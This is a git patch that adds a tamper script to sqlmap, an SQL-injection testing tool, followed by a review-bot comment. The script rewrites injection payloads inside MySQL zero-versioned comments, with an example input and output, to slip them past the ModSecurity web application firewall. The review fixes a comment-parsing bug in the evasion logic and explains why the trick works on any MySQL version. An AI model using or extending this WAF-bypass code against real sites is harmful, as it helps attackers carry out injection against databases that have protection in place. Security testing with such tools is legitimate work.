From 38e2d0896b7ba73f531cd9615fa61affa92776f1 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 25 Oct 2011 13:40:32 +0000
Subject: [PATCH] new tamper script

---
 tamper/modsecurityzeroversioned.py | 47 ++++++++++++++++++++++++++++++
 1 file changed, 47 insertions(+)
 create mode 100644 tamper/modsecurityzeroversioned.py

diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py
new file mode 100644
index 000000000..93a73c913
--- /dev/null
+++ b/tamper/modsecurityzeroversioned.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.HIGHER
+
+def dependencies():
+    pass
+
+def tamper(payload):
+    """
+    Embraces complete query with zero-versioned comment
+
+    Example:
+        * Input: 1 AND 2>1--
+        * Output: 1 /*!00000AND 2>1*/--
+
+    Requirement:
+        * MySQL
+
+    Tested against:
+        * MySQL 5.0
+
+    Notes:
+        * Useful to bypass ModSecurity WAF/IDS
+    """
+
+    retVal = payload
+
+    if payload:
+        postfix = ''
+        for comment in ('#', '--', '/*'):
+            if comment in payload:
+                postfix = payload[payload.find(comment):]
+                payload = payload[:payload.find(comment)]
+                break
+        if ' ' in payload:
+            retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix)
+
+    return retVal
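Review bot: The comment-postfix split in `tamper` picks the separator by tuple order rather than by position: a payload containing `/*` ahead of `--` (e.g. `1 /*x*/ AND 2>1-- `) is cut at `--`, so the `/*x*/` comment lands inside the wrapper and its `*/` closes `/*!00000` early, leaving a stray `*/` and a broken query. Cutting at the earliest occurrence keeps every trailing comment outside the versioned block: `cuts = [payload.find(c) for c in ('#', '--', '/*') if c in payload]` / `if cuts:` / `postfix, payload = payload[min(cuts):], payload[:min(cuts)]`. A `#` or `--` inside a quoted literal would still be taken as a comment start; whether such payloads reach this script cannot be told from the hunk. The docstring would also benefit from a line under Notes explaining why the trick is version-independent, e.g. `* MySQL executes the body of /*!NNNNN ... */ whenever its version is >= NNNNN, so 00000 always matches`.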